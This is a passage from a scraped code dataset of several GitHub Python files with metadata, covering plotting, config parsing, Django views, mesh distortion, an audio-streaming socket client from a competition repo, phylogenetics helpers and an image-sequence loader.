min_results = generations[:take], average_results[:take], max_results[:take], min_results[:take]\n\npyplot.subplot(211)\naverage_plot, = pyplot.plot(generations, average_results, label=\"Average\")\nmin_plot, = pyplot.plot(generations, min_results, label=\"Min\")\npyplot.xlabel(\"generation\")\npyplot.ylabel(\"fitness\")\n\npyplot.legend(handles=[average_plot, min_plot])\n\npyplot.subplot(212)\npyplot.xlabel(\"generation\")\npyplot.ylabel(\"fitness\")\nmax_plot, = pyplot.plot(generations, max_results, label=\"Max\")\npyplot.legend(handles=[max_plot])\n\npyplot.setp(min_plot, linewidth=0.2)\npyplot.setp(max_plot, linewidth=0.2)\npyplot.setp(average_plot, linewidth=0.2)\n\npyplot.show()", "repo_name": "cohen990/evolution-of-tetris", "sub_path": "plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 2014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 30, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "71965188994", "text": "import re, os, sys\nfrom .utils import _is_property, _is_method\n\ndef _try_eval(s):\n try:\n s = eval(s)\n except:\n pass\n return s\nclass _Base(type):\n def __getattr__(self, name):\n return ''\n\nclass Base(metaclass=_Base):\n _cls = 'Config'\n def __getattr__(self, name):\n return ''\n\n # dict-like interface\n def __getitem__(self, key):\n return getattr(self, key)\n def __setitem__(self, key, item):\n setattr(self, key, item)\n\n def __init__(self, cfg=None, parse=False):\n if cfg:\n self.update(cfg, exclude=[])\n if parse:\n self.parse()\n\n def update(self, cfg, key=None, exclude=['name', 'idx_name']):\n if key != None: # store cfg as a sub-config\n setattr(self, key, Base(cfg))\n elif isinstance(cfg, str): # path / dict in str\n if os.path.isfile(cfg) and cfg.endswith('yaml'):\n import yaml\n with open(cfg) as f:\n cfg = dict(yaml.load(f, Loader=yaml.FullLoader))\n elif cfg.startswith('{') and cfg.endswith('}'):\n cfg = eval(cfg)\n else:\n cfg = dict([[i.strip() for i in t.split(':')] for t in cfg.split(',')])\n cfg = {_try_eval(k): _try_eval(v) for k, v in cfg.items()}\n self.update(cfg, exclude=exclude)\n elif isinstance(cfg, dict): # update from dict\n for k, v in cfg.items():\n if k in exclude:\n pass\n elif _is_property(self, k) or _is_method(getattr(self, k)):\n # print(f'{k} is a property / method in {self}', file=sys.stderr)\n try:\n setattr(self, k, v)\n except:\n raise KeyError(f'{k} is a property / method in {self}')\n elif 
isinstance(v, dict): # nesting dict\n if hasattr(self, k) and isinstance(getattr(self, k), dict): # replace the dict (if it exists & is indeed a dict)\n setattr(self, k, v)\n elif hasattr(self, k) and isinstance(getattr(self, k), Base): # update the sub-config\n getattr(self, k).update(v, exclude=exclude)\n else: # extend to be a sub-config\n self.update(v, key=k, exclude=exclude)\n else:\n setattr(self, k, v)\n else: # update from another cfg\n for attr in [i for i in dir(cfg) if not i.startswith('_') and i not in self._attr_dict]:\n if not _is_property(self, attr) and not _is_method(getattr(cfg, attr)) and attr not in exclude:\n setattr(self, attr, getattr(cfg, attr))\n def parse(self):\n pass\n\n def freeze(self):\n cfg = Base()\n cfg.update(self, exclude=[]) # turn all property into frozen args\n return cfg\n\nclass Config(Base):\n\n # ---------------------------------------------------------------------------- #\n # project-wise setting\n # ---------------------------------------------------------------------------- #\n data_path = 'Data'\n saving_path = None\n saving = True # save model snap\n save_val = '' # keys to save\n save_test = False # save model inference results after trained\n snap_dir = 'snapshots'\n snap_prefix = 'snap'\n # summary_dir = '' # use saving_path - assume single train per saving_path\n max_to_keep = 100\n mode = 'train'\n\n rand_seed = 0\n distribute = 'tf_device'\n colocate_gradients_with_ops = False\n\n grad_raise_none = True\n\n @property\n def gpu_devices(self):\n if isinstance(self.gpus, int) or self.gpus.isdigit():\n cuda_dev = [str(i) for i in range(int(self.gpus))]\n else:\n assert ',' in self.gpus, f'unexpected cfg.gpus = {self.gpus}'\n cuda_dev = [i.strip() for i in self.gpus.split(',') if i.strip()]\n cuda_dev = ','.join(cuda_dev)\n return cuda_dev\n @property\n def gpu_num(self):\n # NOTE: gpu_num=1 when gpus=0, as gpu_devices='' => gpu_devices.split(',')=['']\n # => check if gpu available by gpu_devices == ''\n return len(self.gpu_devices.split(','))\n @property\n def _num_layers(self):\n # Number of layers - downsample_stage, each stage = [downsample ops, ops, ...]\n is_down_stage = lambda blk: any([k in blk for k in ['pool', 'strided']])\n return len([block for block in self.architecture if is_down_stage(block)]) + 1\n @property\n def idx_name_pre(self): return type(self).__name__.lower()\n\n def __init__(self, cfg=None, parse=True):\n super(Config, self).__init__(cfg, parse)\n if parse:\n self.parse()\n\n def parse(self):\n if self.architecture:\n assert self.num_layers == self._num_layers, f'claim as {self.num_layers}, but calc to be {self._num_layers}'\n\n if not self.architecture_dims:\n # d_out - output dims of each stage (first_features_dim = d_in of stage 0)\n self.architecture_dims = [self.first_features_dim * (2 ** i) for i in range(1, self.num_layers + 1)]\n # self.architecture_cfg = super(Config, self).parse() # parse config\n", "repo_name": "LiyaoTang/contrastBoundary", "sub_path": "tensorflow/config/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 5254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 117, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 38, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 38, "usage_type": "attribute"}, {"api_name": "utils._is_property", "line_number": 
49, "usage_type": "call"}, {"api_name": "utils._is_method", "line_number": 49, "usage_type": "call"}, {"api_name": "utils._is_property", "line_number": 66, "usage_type": "call"}, {"api_name": "utils._is_method", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "6981296783", "text": "from django.urls import path\n\nfrom . import views\napp_name = 'icon'\n\nurlpatterns = [\n path('icons/', views.ViewIcon.as_view(), name='icons'),\n path('icons//', views.DetailIcon.as_view(), name='icon'),\n path('delete_review_icon//', views.delete_review, name='delete-review'),\n path('icon_like/', views.like, name='add_like'),\n path('api/v1/', views.IconDetailView.as_view()),\n path('api/v2/', views.IconCreateView.as_view()),\n]\n", "repo_name": "Ioann55007/The-Artist", "sub_path": "icons/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "22995689864", "text": "\nimport torch\n\n\ndef compute_distortion(points, faces, param):\n\n triangles = points[faces]\n triangles = triangles - triangles[:, -1].unsqueeze(1)\n triangles = triangles[:, :-1].transpose(1,2)\n\n U, _, _ = torch.svd(triangles, compute_uv=True)\n P = U.transpose(1,2).matmul(triangles)\n P_ext = torch.cat([P, torch.zeros(triangles.size(0), 2,1).to(P.device)], dim=-1)\n P_ext_2 = torch.cat([P_ext, torch.ones(P.size(0), 1, 3).to(P.device)], dim=1)\n P_inv = P_ext_2.inverse()\n\n Q = param[faces].transpose(1,2) # Fx2x3\n\n J = Q.matmul(P_inv)\n J = J[:, :2, :2]\n FFF = J.transpose(1,2).matmul(J)\n\n scale_distortion = FFF[:, 0, 0] / FFF[:, 1, 1]\n angle_distortion = FFF[:, 0, 0] * FFF[:, 1, 1]\n\n return scale_distortion, angle_distortion\n", "repo_name": "luca-morreale/neural_surfaces", "sub_path": "utils/distortion.py", "file_name": "distortion.py", "file_ext": "py", "file_size_in_byte": 771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.svd", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "19535459538", "text": "#!/usr/bin/env python3\nimport wave\nimport socket\nimport sys\nimport queue\nimport traceback\nimport threading\n\ntry:\n import pyaudio\nexcept ImportError:\n traceback.print_exc()\n print(\n 'Du har inte installerat PyAudio. Du kan göra det genom att köra \"python -m pip install pyaudio\"'\n )\n\n# Du behöver inte förstå vad den här filen gör för att lösa uppgiften. Kort sagt kopplar den upp sig till servern och streamar ljud från den samtidigt som den skickar upp ljud från din mikrofon. 
På vissa datorer kan det här funka mindre bra, om du stöter på problem som du inte lyckas fixa försök då på en annan dator eller fråga en lagkamrat att testa på sin egen.\n\n# för att ändra input/output enheter ändra dessa till ints som representerar indexet\ndefault_input = None\ndefault_output = None\n\np = pyaudio.PyAudio()\ndevices = [p.get_device_info_by_index(i) for i in range(p.get_device_count())]\n\npulseindex = None\nfor device in devices:\n if device[\"name\"] == \"pulse\":\n pulseindex = device[\"index\"]\n break\nif not default_output and pulseindex is not None:\n default_output = pulseindex\nif not default_input and pulseindex is not None:\n default_input = pulseindex\n\nprint(\"*\" * 50)\nfor device in devices:\n print(device[\"index\"], device[\"name\"])\n\nif default_input:\n device_input = p.get_device_info_by_index(default_input)\nelse:\n device_input = p.get_default_input_device_info()\n\nif default_output:\n device_output = p.get_device_info_by_index(default_output)\nelse:\n device_output = p.get_default_output_device_info()\n\nprint()\nprint(\"Spelar in från:\", device_input[\"index\"], device_input[\"name\"])\nprint(\"Spelar ljud på:\", device_output[\"index\"], device_output[\"name\"])\nprint(\"För att ändra dessa enheter, redigera filen\")\nif pulseindex is not None:\n print(\"pulse brukar funka bäst på linux datorer\")\nprint(\"*\" * 50)\n\nsamplerate = 16000\nblocksize = 600\nblocksize_bytes = blocksize * 2\n\nrecv_audio = queue.Queue()\nsend_queue = []\n\nn_recv = 0\nn_sent = 0\n\n\ndef better_send(socket, buf):\n while len(buf):\n sent = socket.send(buf)\n buf = buf[sent:]\n return buf\n\n\ndef better_recv(socket, bufsize):\n try:\n buf = b\"\"\n while len(buf) < bufsize:\n buf += socket.recv(bufsize - len(buf))\n return buf\n except ConnectionResetError:\n return b\"\"\n\n\ndef callback(indata, frame_count, time_info, status):\n global send_queue\n\n try:\n if status:\n print(\"error:\", status)\n\n send_queue.extend(indata)\n\n audio = []\n for _ in range(frame_count * 2):\n d = recv_audio.get()\n if d is None:\n print(\"out of data!\")\n return bytes([]), pyaudio.paAbort\n\n audio.append(d)\n\n return bytes(audio), pyaudio.paContinue\n except:\n traceback.print_exc()\n\n\ndef send_blocks_to_server(s):\n global send_queue, n_sent\n\n try:\n while send_queue is not None:\n if len(send_queue) > blocksize_bytes:\n block = send_queue[:blocksize_bytes]\n send_queue = send_queue[blocksize_bytes:]\n\n # print(\"Sending block: \", n_recv - n_sent)\n better_send(s, bytes(block))\n n_sent += len(block)\n except:\n traceback.print_exc()\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.settimeout(5)\n s.connect((sys.argv[1], int(sys.argv[2])))\n\n try:\n stream = p.open(\n format=p.get_format_from_width(2),\n channels=1,\n rate=samplerate,\n input=True,\n output=True,\n frames_per_buffer=blocksize,\n stream_callback=callback,\n input_device_index=device_input[\"index\"],\n output_device_index=device_output[\"index\"],\n )\n except OSError:\n traceback.print_exc()\n print(\n \"Något gick fel vid initialisering av audio. Testa byta audioenheter så kanske det löser sig. 
Läs texten mellan stjärnorna för mer info om hur man gör det.\"\n )\n exit(1)\n\n t = threading.Thread(target=send_blocks_to_server, args=(s,))\n t.start()\n\n while stream.is_active():\n try:\n while True:\n data = better_recv(s, blocksize_bytes)\n n_recv += len(data)\n # print(\"got\", len(data))\n if data == b\"\":\n recv_audio.put(None)\n print(\"Audio stream ended, playing remaining and exiting...\")\n while not recv_audio.empty():\n pass\n break\n\n for b in data:\n recv_audio.put(b)\n\n except KeyboardInterrupt:\n print(\"exiting...\")\n recv_audio.put(None)\n send_queue = None\n t.join()\n\n break\n", "repo_name": "Kodsport/sakerhetssm-2023-solutions", "sub_path": "kval/misc/telefonsvar/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 4887, "program_lang": "python", "lang": "sv", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "traceback.print_exc", "line_number": 12, "usage_type": "call"}, {"api_name": "pyaudio.PyAudio", "line_number": 23, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 62, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 71, "usage_type": "call"}, {"api_name": "socket.recv", "line_number": 80, "usage_type": "call"}, {"api_name": "pyaudio.paAbort", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pyaudio.paContinue", "line_number": 104, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 106, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 122, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 125, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 125, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 125, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 127, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 142, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 148, "usage_type": "call"}]} +{"seq_id": "71447428995", "text": "from rest_framework.decorators import api_view \nfrom rest_framework.response import Response \nfrom rest_framework import status\nfrom .serializers import MovieDetailSerializer, MovieSerializer\nfrom .models import Movie\n \n@api_view(['GET']) \ndef index(request): \n context = {\n 'number' : 100,\n 'float' : 1.11,\n 'text' : \"Hello World\",\n 'list' : [1, 2, 3],\n 'dict' : {\"name\" : 'Beks'}\n }\n return Response(data=context, status=status.HTTP_200_OK)\n\n\n@api_view([\"GET\"])\ndef movie_list_view(request):\n movies = Movie.objects.all()\n data = MovieSerializer(movies, many=True).data\n return Response(data=data)\n\n\n@api_view([\"GET\"])\ndef movie_detail_view(request, id):\n try:\n movie = Movie.objects.get(id=id)\n except Movie.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error':'Movie not found'})\n\n data = MovieDetailSerializer(movie, many=False).data\n return Response(data=data)", "repo_name": "BeksBratan/DjangoRest", "sub_path": "MovieBackend/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.response.Response", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 16, "usage_type": "name"}, 
{"api_name": "rest_framework.decorators.api_view", "line_number": 7, "usage_type": "call"}, {"api_name": "models.Movie.objects.all", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Movie.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Movie", "line_number": 21, "usage_type": "name"}, {"api_name": "serializers.MovieSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Movie.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Movie.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Movie", "line_number": 29, "usage_type": "name"}, {"api_name": "models.Movie.DoesNotExist", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Movie", "line_number": 30, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "serializers.MovieDetailSerializer", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "70410245635", "text": "from scipy import stats\nfrom collections import OrderedDict\nimport sys, re, os, logging, ete3\n\ndef getParams(models, paml, bppml, mixed, Busted, Meme, opb, gnh):\n\t# Check analyses to be run and where the parameters file are\n\n\tdCtrls = {}\n\tlModels = []\n\tif models != \"\":\n\t\tif bppml not in [\"\", \"False\", False]:# and mixed not in [\"\", \"False\", False]:\n\t\t\tdCtrls[\"bppml\"] = bppml\n\t\t\tdCtrls[\"bppmixedlikelihood\"] = mixed\n\t\tif paml not in [\"\", \"False\", False]:\n\t\t\tdCtrls[\"paml\"] = paml\n\t\tlModels = re.compile(\"\\s*,\\s*\").split(models)\n\tif opb != \"\" and opb != False:\n\t\tdCtrls[\"OPB\"] = opb\n\tif gnh != \"\" and gnh != False:\n\t\tdCtrls[\"GNH\"] = gnh\n\tif Busted:\n\t\tdCtrls[\"BUSTED\"] = \"\"\n\tif Meme:\n\t\tdCtrls[\"MEME\"] = \"\"\n\n\treturn dCtrls, lModels\n\ndef supBoot(outDir, baseName, treeFile, logger):\n\t# Suppress bootstrap numbers from treeFile (necessary for HYPHY)\n\tcladoFile = outDir+baseName+\"_clado.tree\"\n\tt = ete3.Tree(treeFile)\n\tt.write(format=9, outfile=cladoFile)\n\treturn cladoFile\n\ndef nbNode(treeFile, logger):\n\t# count number of nodes in tree file\n\twith open(treeFile, \"r\") as tree:\n\t\tdata = tree.read()\n\t\tnodes = str(data.count(\"(\")+data.count(\")\"))\n\t\tlogger.info(\"There are {:s} nodes in the provided tree.\".format(nodes))\n\t\ttree.close()\n\treturn nodes\n\ndef LRT(ll1, ll2, df):\n\t\"\"\"\n\tCalculates likelihood ratio test between two models.\n\t:params ll1, ll2: likelihood of the two models studied\n\t:param df: degrees of freedom of difference between the two models\n\t\"\"\"\n\tstats.chisqprob = lambda chisq, df: stats.chi2.sf(chisq, df)\n\tLR = max(2*(ll2-ll1),0)\n\tp = stats.chisqprob(LR, df)\n\treturn(LR, p)\n\ndef NHXTree(tree):\n\t\"\"\"\n\tTake a newick tree and outputs it in NHX format with branch numbering.\n\t\"\"\"\n\tpattern = 
re.compile(r\"[,\\)]\")\n\tpar=pattern.findall(tree)\n\tlm=pattern.split(tree)\n\t\n\tnhxpar=[\"[&&NHX:ND=%d]\"%i+par[i] for i in range(len(par))]\n\t\n\tlc=[\"\".join(x) for x in zip(lm,nhxpar)]\n\tsout=\"\".join(lc)+\";\"\n\t\n\treturn sout\n\t\ndef pspFileCreation(path, option):\n if True:\n dparams={}\n dparams[\"alphabet\"] = \"Codon(letter=DNA)\"\n dparams[\"input.data1\"] = \"alignment(file=$(INPUTFILE), format=$(FORMAT), sites_to_use=all, max_gap_allowed=50%, max_unresolved_allowed=100%)\"\n dparams[\"input.tree1\"] = \"user(file=$(TREEFILE), format=Newick)\"\n dparams[\"phylo1\"] = \"Single(process=1, data=1)\"\n if option == \"mixedlikelihood\":\n #dparams[\"params\"] = \"$(PARAMS)\"\n dparams[\"output.likelihoods.file\"] = \"$(OUTINFO)\"\n else:\n dparams[\"root_freq1\"] = \"F3X4(init=observed, data=1)\"\n dparams[\"rate_distribution1\"] = \"$(DISTRIB)\"\n dparams[\"optimization\"] = \"FullD(derivatives=Newton)\"\n dparams[\"optimization.ignore_parameters\"] = \"$(IGNORE)\"\n dparams[\"optimization.max_number_f_eval\"] = \"1000\"\n dparams[\"optimization.tolerance\"] = \"0.00001\"\n dparams[\"output.tree.file\"] = \"$(OUTTREE)\"\n dparams[\"output.tree.format\"] = \"Newick\"\n dparams[\"output.estimates\"] = \"$(OUTPARAMS)\"\n dparams[\"optimization.backup.file\"] = \"$(BACKUP)\"\n if option == \"bppml\":\n dparams[\"model1\"] = \"$(MODEL)\"\n dparams[\"process1\"] = \"Homogeneous(model=1, tree=1, rate=1, root_freq=1)\"\n dparams[\"scenario1\"] = \"split(model=1)\"\n elif option == \"gnh\":\n dparams[\"nonhomogeneous\"] = \"general\"\n dparams[\"nonhomogeneous.number_of_models\"] = \"2\"\n dparams[\"model1\"] = \"YNGP_M1(frequencies=F3X4,initFreqs=observed, data=1)\"\n dparams[\"model2\"] = \"YNGP_M2(frequencies=F3X4,initFreqs=observed,kappa=YNGP_M1.kappa_1,omega=YNGP_M1.omega_1, data=1)\"\n dparams[\"process1\"] = \"NonHomogeneous(model1=1, model1.nodes_id=$(NODES1), model2=2, model2.nodes_id$(NODES2), tree=1, rate=1, root=1)\"\n dparams[\"optimization.ignore_parameters\"] = \"BrLen,*kappa*,*theta*,Ancient\"\n\n with open(path, \"w\") as bppFile:\n bppFile.write(\"\\n\".join([par + \" = \" + val for par,val in dparams.items()]))\n bppFile.close()\n", "repo_name": "leapicard/DGINN", "sub_path": "lib/PSPFunc.py", "file_name": "PSPFunc.py", "file_ext": "py", "file_size_in_byte": 3887, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "ete3.Tree", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.stats.chisqprob", "line_number": 50, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 50, "usage_type": "name"}, {"api_name": "scipy.stats.chi2.sf", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.stats.chi2", "line_number": 50, "usage_type": "attribute"}, {"api_name": "scipy.stats.chisqprob", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 52, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "31394908135", "text": "from io import BytesIO\nimport os\nfrom typing import Dict, List\n\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\n\nfrom babylog.data_utils import BoundingBoxDict\nfrom babylog.protobuf import Image, ClassificationResult, BoundingBox\nfrom babylog.logger import babylogger\n\n\ndef bytes_to_image(raw_bytes_: bytes) -> np.ndarray:\n return cv2.imdecode(np.frombuffer(raw_bytes_, 
np.byte), cv2.IMREAD_ANYCOLOR)\n\n\ndef image_to_bytes(array_: np.ndarray) -> bytes:\n return cv2.imencode(\".jpg\", array_)[1].tobytes()\n\n\ndef ndarray_to_Image(array_: np.ndarray) -> Image:\n assert isinstance(array_, np.ndarray), \"please pass a numpy array\"\n assert len(array_.shape) == 3, \"np.ndarray image has more than 3 dimensions\"\n image = Image(\n **dict(\n zip(\n list(Image.DESCRIPTOR.fields_by_name.keys()),\n [*array_.shape, image_to_bytes(array_=array_)],\n )\n )\n )\n return image\n\n\ndef classification_from_dict(dict_: Dict[str, float]) -> List[ClassificationResult]:\n assert all(\n isinstance(key, str) for key in dict_.keys()\n ), \"classification dict keys are not of type string\"\n assert all(\n isinstance(val, float) for val in dict_.values()\n ), \"classification dict values are not of type float\"\n\n return [\n ClassificationResult(class_name=key_, probability=value_)\n for key_, value_ in dict_.items()\n ]\n\n\ndef check_bbox_dict(dict_: BoundingBoxDict):\n assert all(\n [elem in dict_ for elem in BoundingBoxDict.__annotations__.keys()]\n ), \"incorrect format of the detection dictionary\"\n assert all(\n [\n type(dict_[key_]) == value_\n for key_, value_ in BoundingBoxDict.__annotations__.items()\n if key_ != \"classification\"\n ]\n ), \"incorrect format of the detection dictionary\"\n\n\ndef detection_from_dict(bboxes: List[BoundingBoxDict]) -> List[BoundingBox]:\n detections = []\n for dict_ in bboxes:\n check_bbox_dict(dict_)\n assert set(dict_.keys()) == set(\n BoundingBoxDict.__annotations__.keys()\n ), \"incorrect format of the detection dictionary\"\n classifier_result_ = dict_[\"classification\"]\n dict_.pop(\"classification\")\n bboxes_message = BoundingBox(**dict_)\n bboxes_message.classification_result.extend(\n classification_from_dict(classifier_result_)\n )\n detections.append(bboxes_message)\n return detections\n\n\nclass ImageSequence:\n def __init__(\n self,\n path=None,\n extensions=None,\n timestamp_file=None,\n rotate=False,\n scale=0.5,\n **kwargs\n ):\n self.path = path\n self.rotate = rotate\n self.scale = scale\n self.width = None\n self.height = None\n self.frame_count = None\n self.video = None\n self.images = None\n self.scaled_dim = None\n self.frame_num = 0\n self.playback_speed = 50\n self.raw_video_string = \"Scaled Raw Image\"\n self.frame = None\n self.is_image = False\n self.is_video = False\n\n if timestamp_file is None:\n self.timestamps = None\n else:\n with open(timestamp_file, \"r\") as filehandle:\n self.timestamps = [\n timestamp.rstrip() for timestamp in filehandle.readlines()\n ]\n\n if self.path is not None:\n if self.check_directory():\n self.is_video = False\n if not extensions:\n extensions = [\".jpg\", \".jpeg\", \".png\"]\n self.images = [\n f\n for f in sorted(os.listdir(self.path))\n if os.path.splitext(f)[1] in extensions\n ]\n babylogger.info(\"Found {} images in folder\".format(len(self.images)))\n if not self.images:\n self.is_image = False\n raise NotImplementedError\n else:\n self.is_image = True\n elif self.check_video():\n self.is_video = True\n else:\n raise NotImplementedError\n\n if self.is_video:\n self.video = cv2.VideoCapture(self.path)\n\n self.get_dimensions()\n self.scaled_dim = (int(self.width * self.scale), int(self.height * self.scale))\n config = {\n \"video\": self.is_video,\n \"image\": self.is_image,\n \"scaled dimensions\": self.scaled_dim,\n \"frame count\": self.frame_count,\n }\n babylogger.info(\"[CONFIG video]: {}\".format(config))\n super().__init__(**kwargs)\n\n def 
check_directory(self):\n return os.path.isdir(self.path)\n\n def check_file(self):\n return os.path.isfile(self.path)\n\n def check_video(self):\n extensions = [\".mp4\", \".avi\"]\n if os.path.splitext(self.path)[1] in extensions:\n return True\n return False\n\n def get_dimensions(self):\n if self.is_video:\n width = self.video.get(cv2.CAP_PROP_FRAME_WIDTH)\n height = self.video.get(cv2.CAP_PROP_FRAME_HEIGHT)\n self.width = width if not self.rotate else height\n self.height = height if not self.rotate else width\n self.frame_count = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))\n if self.frame_count <= 0:\n self.frame_count = 0\n while True:\n ret, _ = self.video.read()\n if not ret:\n break\n self.frame_count += 1\n self.video.release()\n self.video = cv2.VideoCapture(self.path)\n\n if self.is_image:\n image = cv2.imread(self.path + \"/\" + self.images[0])\n self.width = image.shape[1]\n self.height = image.shape[0]\n self.frame_count = len(self.images)\n\n def get_frame(self, frame_num):\n self.frame_num = frame_num\n if self.is_video:\n self.video.set(cv2.CAP_PROP_POS_FRAMES, frame_num)\n ret, frame = self.video.read()\n if not ret:\n frame = None\n babylogger.info(\"Could not read frame\")\n else:\n pass\n\n if self.is_image:\n image_path = 